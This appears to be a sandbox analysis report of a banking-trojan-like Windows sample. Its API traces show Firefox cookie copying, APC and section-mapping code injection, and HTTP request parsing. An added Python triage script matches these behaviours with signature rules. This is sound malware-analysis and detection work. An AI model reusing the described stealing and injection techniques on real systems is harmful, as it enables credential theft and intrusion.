  • Opcode Fuzzy Hash: C4E08605119E80CFC45654561E3517755B4FF11D054D9F37477C01BAF5DE662D242E07
  • Instruction Fuzzy Hash: d805b8808fabc8a834a627e3aba00d686e12190f07f1f9d143048ed308849f7e
APIs
    • Part of subcall function 01B345C1: HeapFree.KERNEL32(00000000,00000000,00000000), ref: 01B34610
    • Part of subcall function 01B3475C: lstrlen.KERNEL32(01B3618C,00000000,?,00000027,01B3618C,00000000,00000000,01B3822E,00000000,?,01B3618C,00000000,00000000), ref: 01B34792
    • Part of subcall function 01B3475C: lstrcpy.KERNEL32(00000000,00000000), ref: 01B347B6
    • Part of subcall function 01B3475C: lstrcat.KERNEL32(00000000,00000000), ref: 01B347BE
  • HeapFree.KERNEL32(00000000,?,Local\), ref: 01B31217
Strings
Memory Dump Source
  • Source File: 00000003.00000002.667099668.01B31000.00000020.sdmp, Offset: 01B31000, based on PE: false

Similar Non-Executed Functions

Similarity
  • Total matches: 59
  • API ID: HeapFree$RtlAllocateHeaplstrcat$CreateDirectoryDeleteFilelstrlenmbstowcs
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • API String ID: 2820067504-4232923486
  • Opcode ID: 3d14cf29faf766bfeb75039b264b2d7cbadb4797a584a71d88c970bf056bfa6f
  • Instruction ID: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
  • Opcode Fuzzy Hash: A2118CB00A05034BC02BA862E5AA37F4981BE835C4C4D1763FE05AB12E1F5731E67F0B
  • Instruction Fuzzy Hash: 901aeb1831ed6878ca2adce8fbd2872f2b742ef2d46d3f993e52c754e3bb2ff3
APIs
  • lstrlen.KERNEL32(%APPDATA%), ref: 001C1C68
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D6FCE
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
    • Part of subcall function 001D6F2E: FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D71EE
  • RtlAllocateHeap.NTDLL(00000000,?,%APPDATA%\Mozilla\Firefox\Profiles), ref: 001C1CB3
  • mbstowcs.NTDLL ref: 001C1CC6
  • lstrcatW.KERNEL32(00000000,001EC804), ref: 001C1CD5
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001C1CF9
  • RtlAllocateHeap.NTDLL(00000000,0000020C), ref: 001C1D0B
  • lstrcatW.KERNEL32(00000000,001E53C0), ref: 001C1D2D
  • HeapFree.KERNEL32(00000000,00000000), ref: 001C1D51
    • Part of subcall function 001D6CC6: lstrlen.KERNEL32(?,?,00000000,?,00000000,001C7543,?,?,?,?,?,?,?,?,?,001C1255), ref: 001D6CD5
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: RtlAllocateHeap.NTDLL(00000000,?), ref: 001C1BC4
    • Part of subcall function 001C1B85: lstrcpyW.KERNEL32(00000000,001C1DC2), ref: 001C1BD5
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1BEC
    • Part of subcall function 001C1B85: CreateDirectoryW.KERNEL32(00000000,00000000,?,?,0000005C,?,00000000,?,?,?,\sols,001C1DC2,?,?), ref: 001C1C05
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
    • Part of subcall function 001C1B85: HeapFree.KERNEL32(00000000,00000000), ref: 001C1C42
  • DeleteFileW.KERNEL32(?), ref: 001C1DC6
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DD4
  • HeapFree.KERNEL32(00000000,?), ref: 001C1DF0
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: FindFirstFile$FindCloseFindNextFileWaitForSingleObjectmemset
  • String ID:
  • API String ID: 1787114350-0
  • Opcode ID: f51bd5130761bfcbb2dde5f7148bce543a8c4d605f388eb2cd72b1422ad7a0c5
  • Instruction ID: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
  • Opcode Fuzzy Hash: 9831CD22216EB4C3D517A5A94459779F901DF007D6F09FB11E9A2E04CD9DC35AB0FF18
  • Instruction Fuzzy Hash: bd781be9b02a429d5c41947a9cf951fafe2009a97a88700872d728148f38a155
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • memset.NTDLL ref: 001D6FCE
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D6FE9
  • FindFirstFileW.KERNEL32(00000000,00000000), ref: 001D7129
    • Part of subcall function 001D6F2E: memset.NTDLL ref: 001D704C
    • Part of subcall function 001D6F2E: wcscpy.NTDLL ref: 001D705E
    • Part of subcall function 001D6F2E: RtlEnterCriticalSection.NTDLL(?), ref: 001D70B9
    • Part of subcall function 001D6F2E: RtlLeaveCriticalSection.NTDLL(?), ref: 001D70D5
    • Part of subcall function 001D6F2E: FindNextFileW.KERNEL32(?,00000000), ref: 001D70EE
    • Part of subcall function 001D6F2E: WaitForSingleObject.KERNEL32(00000000), ref: 001D7100
    • Part of subcall function 001D6F2E: FindClose.KERNEL32(?), ref: 001D7115
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D71C1
  • WaitForSingleObject.KERNEL32(00000000), ref: 001D71D3
  • FindClose.KERNEL32(?), ref: 001D71EE
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 57
  • API ID: GetComputerNameHeapFreeRtlAllocateHeap
  • String ID: Client
  • API String ID: 3015569430-3236430179
  • Opcode ID: fd148c837d0b481578b7d1bf63dc4b1a0bf1844f652122844ed59ba803be3f2c
  • Instruction ID: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
  • Opcode Fuzzy Hash: 4AF059624E5981B3403F44DA42A51BE4600F4C31E15CC272BFC14AE2ED8E0770A22F57
  • Instruction Fuzzy Hash: f125b15e941851991c1381d3eb23db14bac24dd9311658ae4169dcc9cf04ff7b
APIs
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE20C
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE250
  • RtlAllocateHeap.NTDLL(00000000,001C3DB4), ref: 001DE267
  • GetComputerNameW.KERNEL32(00000000,001C3DB4), ref: 001DE278
  • HeapFree.KERNEL32(00000000,00000000), ref: 001DE29E
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 131
  • API ID: memcpy$CloseHandleNtUnmapViewOfSectionRtlNtStatusToDosErrormemset
  • String ID:
  • API String ID: 82859500-0
  • Opcode ID: 802cb1472a18bcf34863ad0267a7a7a6718459bcb7b1194f1b5fac1abc944098
  • Instruction ID: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
  • Opcode Fuzzy Hash: FD21E251458E9147DEA730990613FC7D182FF83F84C8DFBA1B8A966ADB0F006146FA4B
  • Instruction Fuzzy Hash: b3044c2808ce89a9f23c6b96715674f9ace9429cd7e542ccdcb812e0ee1843ae
APIs
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
    • Part of subcall function 001DCC65: memset.NTDLL ref: 001DCCE5
    • Part of subcall function 001DCC65: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCD01
    • Part of subcall function 001DCC65: NtClose.NTDLL(?), ref: 001DCD15
  • memcpy.NTDLL(?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBE6D
  • memcpy.NTDLL(?,?,00000018,?,?,?,?,?,?,?,?,?,00000000), ref: 001DBEBC
    • Part of subcall function 001DBBF3: GetModuleHandleA.KERNEL32(001EC8C6,00083097,?,001DBF19,?,?,00000000), ref: 001DBC26
    • Part of subcall function 001DBBF3: memcpy.NTDLL(001ED18C,001EB12C,00000018,001ED16A,001ED18C,001ED181,?,001DBF19,?,?,00000000), ref: 001DBC91
  • memcpy.NTDLL(?,001DC9CF,00000800,?,?,00000000), ref: 001DBF2C
    • Part of subcall function 001D8A52: memset.NTDLL ref: 001D8A71
    • Part of subcall function 001DBCA0: memcpy.NTDLL(?,001EB144,00000018,?,001ED16A,?,001ED18C,?,001ED181,?,001DBF11,?,?,?,00000000), ref: 001DBD31
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001DBF6E
  • CloseHandle.KERNEL32(00000000), ref: 001DBF7D
  • memset.NTDLL ref: 001DBF91
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
    • Part of subcall function 001DCC26: RtlNtStatusToDosError.NTDLL(00000000), ref: 001DCC5A
    • Part of subcall function 001DCD24: memcpy.NTDLL(001DC9CB,001DC9D3,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD84
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,BE0F6600,00083097,?,?,?,?,00000000), ref: 001DCD99
    • Part of subcall function 001DCD24: memcpy.NTDLL(00000000,?,?,00083097,?,?,?,?,00000000), ref: 001DCDDB
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 37
  • API ID: GetLastError$FreeLibraryGetProcAddressLoadLibraryRegCloseKeyRegOpenKey
  • String ID:
  • API String ID: 3176510729-0
  • Opcode ID: c06c93110e7f7b91b8af1b73fb1b0b90ed9f89153cfcabb1f297ed8ce1865d6a
  • Instruction ID: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
  • Opcode Fuzzy Hash: CCF097B98604C18EC212342048796E6BB04AF400C5A9C1762FE94042826F1531673B96
  • Instruction Fuzzy Hash: fcf1d727c95837e4298bacd4dfe6948e9c21b2cb80fe885b4227e83466d2943b
APIs
  • RegOpenKeyA.ADVAPI32(80000002,001E74AC,00000001), ref: 001DF43D
  • RegCloseKey.ADVAPI32(?), ref: 001DF4EE
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • LoadLibraryA.KERNEL32(00000000), ref: 001DF48B
  • GetProcAddress.KERNEL32(00000000,001ED2EE), ref: 001DF49D
  • GetLastError.KERNEL32 ref: 001DF4BC
  • FreeLibrary.KERNEL32(00000000), ref: 001DF4CE
  • GetLastError.KERNEL32 ref: 001DF4D6
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 59
  • API ID: CreateToolhelp32SnapshotGetModuleHandleGetProcAddressOpenThreadQueueUserAPCThread32FirstThread32Next
  • String ID:
  • API String ID: 1672352458-0
  • Opcode ID: 1aeb80c38cfc5c0a8cfd58ac1562df29def6d9c7c8df75773877e7a5eae794f0
  • Instruction ID: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
  • Opcode Fuzzy Hash: D4E02064520567CFC21760B0915371EF90479A5CD5E1C777FF4A428E0B2E0731A7A375
  • Instruction Fuzzy Hash: 2c1285140dd081ac5577a07b8dcb83313de7ecbc8bee00da9e77533937aa6cbe
APIs
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • GetModuleHandleA.KERNEL32(001EC01D,001ED067,00000004,00000000,00000000,00000000,00000001), ref: 001CB3A8
  • GetProcAddress.KERNEL32(00000000), ref: 001CB3AF
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
  • Thread32Next.KERNEL32(001CD6FE,0000001C), ref: 001CB3FB
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 56
  • API ID: DeleteFileFindFirstFileFindNextFileGetLastErrorRemoveDirectory
  • String ID:
  • API String ID: 1089496181-0
  • Opcode ID: 404a45bcf307c79ebd751717ed0c922086e74df7a977f6731b91689120b89dc8
  • Instruction ID: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
  • Opcode Fuzzy Hash: 2401CBA3511DC96BEF83A1E06920BCBD444EF01270E8EE379A934204C54F00798B3B8F
  • Instruction Fuzzy Hash: 90ed9556279df49a0f93b6e45a9746ece17ae1501ae5ed02bf884558c7615ea3
APIs
    • Part of subcall function 001C12EA: RtlAllocateHeap.NTDLL(00000000,00000000,001D9396), ref: 001C12F6
  • FindFirstFileW.KERNEL32(?,00000000), ref: 001D7327
  • RemoveDirectoryW.KERNEL32(?), ref: 001D73A1
  • DeleteFileW.KERNEL32(?), ref: 001D73AC
  • FindNextFileW.KERNEL32(?,00000000), ref: 001D73BF
  • GetLastError.KERNEL32 ref: 001D73DA
    • Part of subcall function 001C12FF: HeapFree.KERNEL32(00000000,?,001DB8F2), ref: 001C130B
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 120
  • API ID: GetLastError$CloseHandleCreateNamedPipeCreateThread
  • String ID:
  • API String ID: 1313248766-0
  • Opcode ID: 30add2293a1c4e7698607cd224a2cd89a7530f0af40c3b4cc732cba0ae1be137
  • Instruction ID: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
  • Opcode Fuzzy Hash: C6D0A7B057080ACAC517A130847936FABD5EFC51C1E8D0776F780B106F6B9731EA989E
  • Instruction Fuzzy Hash: 4148eaee69a31b6fb3cd0b83f2f9e5c8e854a768ff6cb781906392e167196464
APIs
  • CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,001EB0D8,079007F4), ref: 001CBED5
  • CreateThread.KERNEL32(00000000,00000000,001CBB92,00000000,00000000,?), ref: 001CBEEF
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF00
  • CloseHandle.KERNEL32(00000000), ref: 001CBF09
  • GetLastError.KERNEL32(?,?,?,?,?,001CDB1F,?,?,?,?,001EC638), ref: 001CBF11
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 86
  • API ID: HeapFreeNtUnmapViewOfSectionRtlNtStatusToDosError
  • String ID:
  • API String ID: 3330954857-0
  • Opcode ID: 02a61448e217c9ef6f534c07a9fd427649efd77a8a877fb27eb9f5184da74e11
  • Instruction ID: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
  • Opcode Fuzzy Hash: 1CC02BB0481582C3B53F0CA2008E126ED45BAD32E0A0E1025E0083404CF5A3C7FCBF49
  • Instruction Fuzzy Hash: 0644c66e21c54e57ba80f44bb6735bfe181557861a3a7a617ae7e4636646a487
APIs
  • NtUnmapViewOfSection.NTDLL(079007F4), ref: 001CDCCE
  • RtlNtStatusToDosError.NTDLL(00000000), ref: 001CDCD5
  • HeapFree.KERNEL32(00000000,00000000,079007F4), ref: 001CDCE4
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
Similarity
  • Total matches: 52
  • API ID: HeapFreeRtlAllocateHeaplstrlen$StrChrmemcpy$lstrcpynmemmove
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • API String ID: 2276190360-647159250
  • Opcode ID: 54d3a76867c680fbcbb72380afb113d398c97eb44d4465c367e7f7ee21a8a799
  • Instruction ID: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
  • Opcode Fuzzy Hash: 1F41DB301A4E81C7D933309200B7BFAD045FF93694C8DA356CA0165B6F6F826227BB4E
  • Instruction Fuzzy Hash: b8b73962650da9c8cbf1578ec52c8a5265e5485c2cc85bc05aa2a259874b6926
APIs
  • lstrlen.KERNEL32(001ECCEF,00000000,?,?), ref: 001CCB9E
    • Part of subcall function 001C7E94: memset.NTDLL ref: 001C7ED0
    • Part of subcall function 001C7E94: HeapFree.KERNEL32(00000000,00000000), ref: 001C7EED
    • Part of subcall function 001C7E94: memcpy.NTDLL(?,?,001CC506,?,001CC506,?,?,00000000,?,00000000,001CCA48,?,00000000), ref: 001C7F0E
  • RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001CCC38
  • lstrcpyn.KERNEL32(00000000,?,?), ref: 001CCC4D
    • Part of subcall function 001CB4E6: RtlEnterCriticalSection.NTDLL(001EB248), ref: 001CB4F1
    • Part of subcall function 001CB4E6: Sleep.KERNEL32(0000000A,?,?,001CCC60,00000000), ref: 001CB4FB
    • Part of subcall function 001CB4E6: SetEvent.KERNEL32(?,?,001CCC60), ref: 001CB552
    • Part of subcall function 001CB4E6: RtlLeaveCriticalSection.NTDLL(001EB248), ref: 001CB588
  • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 001CCC69
    • Part of subcall function 001C7D61: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 001C7DC3
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DE9
    • Part of subcall function 001C7D61: memcpy.NTDLL(00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7DF8
    • Part of subcall function 001C7D61: memcpy.NTDLL(?,?,?,00000000,?,?,00000000,http://,00000007,?,?,?,001CCC81,00000000), ref: 001C7E0A
  • HeapFree.KERNEL32(00000000,?), ref: 001CCE32
    • Part of subcall function 001C7CFB: StrChrA.SHLWAPI(00000001,0000000D), ref: 001C7D45
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFA1
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CBFD9
    • Part of subcall function 001CBF21: HeapFree.KERNEL32(00000000,?,?), ref: 001CC048
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
  • StrChrA.SHLWAPI(00000001,00000020), ref: 001CCD55
  • lstrlen.KERNEL32(00000000), ref: 001CCD69
  • memmove.NTDLL(?,?,00000001), ref: 001CCD79
    • Part of subcall function 001CC3FD: HeapFree.KERNEL32(00000000,00000008,00000008), ref: 001CC41E
  • lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,?,?), ref: 001CCD9C
  • RtlAllocateHeap.NTDLL(00000000,?), ref: 001CCDC2
  • memcpy.NTDLL(00000000,?,?), ref: 001CCDD6
  • memcpy.NTDLL(?,?,?), ref: 001CCDF6
  • RtlAllocateHeap.NTDLL(00000000,00000000), ref: 001CCEF8
    • Part of subcall function 001CAF14: RtlAllocateHeap.NTDLL(00000000,?), ref: 001CAF93
    • Part of subcall function 001CAF14: wsprintfA.USER32 ref: 001CB04B
    • Part of subcall function 001CAF14: memcpy.NTDLL(00000000,?,?), ref: 001CB090
    • Part of subcall function 001CAF14: InterlockedExchange.KERNEL32(001EAFEC,00000000), ref: 001CB0AE
    • Part of subcall function 001CAF14: HeapFree.KERNEL32(00000000,00000000), ref: 001CB0F1
  • HeapFree.KERNEL32(00000000,00000000,?), ref: 001CCF40
    • Part of subcall function 001DAA89: RtlLeaveCriticalSection.NTDLL(?), ref: 001DAB06
Strings
Memory Dump Source
  • Source File: 00000003.00000002.665638149.001C1000.00000020.sdmp, Offset: 001C1000, based on PE: false
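Read as a set rather than line by line, several of the entries above describe a technique, not just an API: the entry with lstrlen(%APPDATA%) at 001C1C68 resolves %APPDATA%\Mozilla\Firefox\Profiles, creates a directory and copies files into it (\cookie.ff, \cookie.ie, \sols); the entry with NtUnmapViewOfSection at 001DBF67 wraps NtCreateSection (SectionPageProtection 00000040 = PAGE_EXECUTE_READWRITE, AllocationAttributes 08000000 = SEC_COMMIT) and NtMapViewOfSection; the entry with CreateToolhelp32Snapshot at 001CB391 walks threads with Thread32First/Thread32Next, opens each with 001F03FF (THREAD_ALL_ACCESS) and calls QueueUserAPC; and the entry with lstrlen at 001CCB9E searches for the request methods GET, POST, PUT and OPTI followed by a space (StrChrA with 00000020). The Python below is an added triage example, not part of the Joe Sandbox report and not code from the analysed sample: it parses 'APIs' and 'String ID' bullets in the format used on this page and flags function entries whose call set, strings and argument constants together match one of four signatures. The signature table, the ANSI/Unicode suffix folding and the SAMPLE text (abbreviated copies of the entries above, embedded so the script runs offline) are this example's own assumptions, not something the report states.

```python
"""Behavioural triage over the 'APIs' and 'String ID' bullets of a Joe Sandbox function entry."""
from __future__ import annotations
import re
from dataclasses import dataclass, field

# One call line: optional bullet, optional 'Part of subcall function X:' prefix,
# Name.MODULE, optional (args), then 'ref: ADDR'. Section headers never match.
API_LINE = re.compile(
    r"^\s*(?:[•*-]\s*)?(?:Part of subcall function [0-9A-Fa-f]+:\s*)?"
    r"(?P<api>[A-Za-z_][A-Za-z0-9_]*)\.(?P<mod>[A-Z0-9]+)"
    r"(?:\((?P<args>[^)]*)\))?\s*,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)\s*$")
STRING_ID_LINE = re.compile(r"^\s*(?:[•*-]\s*)?String ID:\s*(?P<ids>.*)$")
ANSI_UNICODE_SUFFIX = re.compile(r"(?<=[a-z0-9])[AW]$")

# Signature table (this example's own): (required APIs, required strings,
# required (api, argument index, bit mask) flags), all within one function entry,
# subcall lines included. 0x10 = THREAD_SET_CONTEXT, the right QueueUserAPC needs;
# 0x40 = PAGE_EXECUTE_READWRITE in NtCreateSection's SectionPageProtection (arg 4).
SIGNATURES = {
    "apc-thread-injection": ({"CreateToolhelp32Snapshot", "Thread32First",
                              "OpenThread", "QueueUserAPC"}, set(), [("OpenThread", 0, 0x10)]),
    "section-mapping-injection": ({"NtCreateSection", "NtMapViewOfSection",
                                   "NtUnmapViewOfSection"}, set(), [("NtCreateSection", 4, 0x40)]),
    "firefox-cookie-theft": ({"CreateDirectory", "CopyFile"},
                             {r"%APPDATA%\Mozilla\Firefox\Profiles"}, []),
    "http-request-line-parsing": ({"StrChr"}, {"GET", "POST", "PUT"}, []),
}

@dataclass
class Function:
    calls: list = field(default_factory=list)   # (normalised api, [args], ref)
    strings: set = field(default_factory=set)

    def has_flag(self, api: str, index: int, mask: int) -> bool:
        """True if some call of `api` has a resolved hex argument at `index`
        with every bit of `mask` set; '?' and string arguments are skipped."""
        for name, args, _ in self.calls:
            try:
                if name == api and int(args[index], 16) & mask == mask:
                    return True
            except (IndexError, ValueError):
                continue
        return False

def normalise(api: str) -> str:
    """Fold ANSI/Unicode variants (CreateFileA/W -> CreateFile); heuristic."""
    return ANSI_UNICODE_SUFFIX.sub("", api)

def parse_report(text: str) -> list:
    """One Function per 'Similarity' header; other headings are ignored."""
    functions, current = [], None
    for line in text.splitlines():
        if line.strip() == "Similarity":
            current = Function()
            functions.append(current)
        elif current is None:
            continue
        elif (m := STRING_ID_LINE.match(line)):   # strings are '$'-separated
            current.strings |= {s.strip() for s in m.group("ids").split("$") if s.strip()}
        elif (m := API_LINE.match(line)):
            args = [] if m.group("args") is None else m.group("args").split(",")
            current.calls.append((normalise(m.group("api")), args, m.group("ref")))
    return functions

def classify(fn: Function) -> list:
    apis = {api for api, _, _ in fn.calls}
    return [name for name, (req_apis, strs, flags) in SIGNATURES.items()
            if req_apis <= apis and strs <= fn.strings
            and all(fn.has_flag(*f) for f in flags)]

def triage(text: str) -> list:
    return [classify(fn) for fn in parse_report(text)]

# Constructed input: abbreviated copies of the function entries on this page.
SAMPLE = r"""
Similarity
  • String ID: %APPDATA%$%APPDATA%\Mozilla\Firefox\Profiles$\cookie.ff$\cookie.ie$\sols
  • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 001C1D77
    • Part of subcall function 001C1B85: CopyFileW.KERNEL32(?,00000000,00000000), ref: 001C1C34
Similarity
  • String ID:
    • Part of subcall function 001DCC65: NtCreateSection.NTDLL(?,000F001F,?,?,00000040,08000000,00000000), ref: 001DCCC0
  • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 001DBF67
    • Part of subcall function 001DCC26: NtMapViewOfSection.NTDLL(?,00000000,?,00000000,00000000,00000000,?,00000002,00000000,00000040), ref: 001DCC53
Similarity
  • CreateToolhelp32Snapshot.KERNEL32 ref: 001CB391
  • Thread32First.KERNEL32(001CD6FE,0000001C), ref: 001CB3BF
  • OpenThread.KERNEL32(001F03FF,00000000,00000000,001CD6FE,0000001C), ref: 001CB3DA
  • QueueUserAPC.KERNEL32(?,00000000,00000000), ref: 001CB3EB
Similarity
  • String ID: GET $GET $OPTI$OPTI$POST$PUT
  • StrChrA.SHLWAPI(?,00000020), ref: 001CCD44
Similarity
  • HeapFree.KERNEL32(00000000,?), ref: 001DE242
"""
if __name__ == "__main__":
    for i, fn in enumerate(parse_report(SAMPLE)):
        print(f"function {i}: {classify(fn) or 'no signature hit'}")
```

Treat hits as leads, not verdicts. NtCreateSection followed by NtMapViewOfSection is also how ordinary shared memory is set up (the entry further down with CreateFileMapping and the Local\ string is a named mapping of that kind), the static call list does not show whether the thread handed to QueueUserAPC belongs to another process, and a 'Total matches' count records fuzzy-hash similarity to other analysed functions rather than behaviour; confirm any hit against the dynamic behaviour sections of the report before acting on it.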
Similarity
  • Total matches: 26
  • API ID: _allmul$ReleaseMutex$SwitchToThreadWaitForMultipleObjects$CreateEventGetVersionExHeapFreeRtlAllocateHeapWaitForSingleObjectwsprintf
  • String ID: Main
  • API String ID: 2221804333-521822810
  • Opcode ID: c3ad4a6a675d9a90d5801a5de4b291fceb9dcbf29faafd690d2866f6f91e145a
  • Instruction ID: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
  • Opcode Fuzzy Hash: F551C076342F4283C127AC94C0857BAE546EF421E9C0C3712FA92795DD1E8B46F4FB9A
  • Instruction Fuzzy Hash: 0c982d03196e014ad468eeb9cce82b5e6bff00813c64cb0cfec4dfb079d796f5
APIs
    • Part of subcall function 001C44E2: WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 001C4515
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45BC
    • Part of subcall function 001C44E2: ReleaseMutex.KERNEL32(00000000), ref: 001C45C5
    • Part of subcall function 001C44E2: CloseHandle.KERNEL32(00000000), ref: 001C45D3
    • Part of subcall function 001C44E2: GetLastError.KERNEL32 ref: 001C45E0
    • Part of subcall function 001C439B: OpenWaitableTimerA.KERNEL32(00100002,00000000,?), ref: 001C43B2
    • Part of subcall function 001C439B: CreateWaitableTimerA.KERNEL32(001EB0D8,?,?), ref: 001C43D1
    • Part of subcall function 001C439B: GetLastError.KERNEL32 ref: 001C43E1
    • Part of subcall function 001C439B: GetSystemTimeAsFileTime.KERNEL32(?,00000000,00000002,?), ref: 001C4428
    • Part of subcall function 001C439B: HeapFree.KERNEL32(00000000,00000002,00000000), ref: 001C445C
  • GetVersionExA.KERNEL32 ref: 001C52AE
  • RtlAllocateHeap.NTDLL(00000000,00000042), ref: 001C52C1
  • wsprintfA.USER32 ref: 001C52F3
    • Part of subcall function 001C4EEE: lstrcmp.KERNEL32(?,?), ref: 001C4F65
    • Part of subcall function 001C4EEE: GetCurrentThreadId.KERNEL32(?,?,00000000,?,Function_00003E59,?,00000001), ref: 001C5037
    • Part of subcall function 001C4EEE: GetCurrentThread.KERNEL32 ref: 001C5048
    • Part of subcall function 001C4EEE: RtlAllocateHeap.NTDLL(00000000,00000400,?), ref: 001C50A6
    • Part of subcall function 001C4EEE: wsprintfA.USER32 ref: 001C50B7
    • Part of subcall function 001C4EEE: lstrlen.KERNEL32(00000000,00000000), ref: 001C50C2
    • Part of subcall function 001CBD48: lstrlen.KERNEL32(?,00000000,?,?,?,?,?,?,001CD153,00000125,?,00000004,00000000), ref: 001CBD78
    • Part of subcall function 001CBD48: RtlAllocateHeap.NTDLL(00000000,?,00000000), ref: 001CBD8E
